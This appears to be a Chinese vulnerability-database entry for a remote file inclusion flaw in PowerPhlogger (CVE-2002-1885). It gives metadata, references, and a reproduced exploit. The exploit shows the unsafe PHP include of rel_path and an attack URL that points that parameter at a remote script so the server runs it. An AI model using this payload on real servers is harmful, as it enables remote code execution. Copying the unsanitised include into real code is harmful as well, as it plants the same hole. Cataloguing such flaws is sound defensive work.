PowerPhlogger远程文件包含漏洞

漏洞ID	1111331	漏洞类型	配置错误
发布时间	2006-10-19	更新时间	2006-10-19
CVE编号	CVE-2002-1885	CNNVD-ID	CNNVD-200212-295
漏洞平台	PHP	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/2602
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-295

|漏洞详情

PowerPhlogger(PPhlogger)2.0.9到2.2.2版本showhits.php3存在PHP远程文件包含漏洞。远程攻击者借助rel_path参数执行任意代码。

|漏洞EXP

#################################
# Power Phlogger 2.0.9 -        #
#################################
#Class:     Remote|Local File Include Vulnerability
# Remote:    Yes
# Local:     No
# Type:      High
# Site:      http://www.comscripts.com/scripts/php.power-phlogger.211.html #
# Author:    x_w0x
# Contact:   x_w0x@hotmail.com
###################################
#Vuln Code
(config.inc.php3):
<?php
include $rel_path."functions.php3";//nothing here
?>

#
http://victim.com/[Power Phlogger 2.0.9]/config.inc.php3?rel_path=http://DarknesseScript.txt


#Gr££tz:makoki, azzcoder,xoron,osm@n
#Speciale gr££tz: str0ke, and elite-team

# milw0rm.com [2006-10-19]

|参考资料

来源:BID
名称:5860
链接:http://www.securityfocus.com/bid/5860
来源:XF
名称:powerphlogger-showhits-file-include(10309)
链接:http://www.iss.net/security_center/static/10309.php
来源:BUGTRAQ
名称:20021002MultipleWebSecurityHoles
链接:http://archives.neohapsis.com/archives/bugtraq/2002-10/0016.html

PowerPhlogger远程文件包含漏洞

|漏洞来源

|漏洞详情

|漏洞EXP

|参考资料

检索漏洞

相关漏洞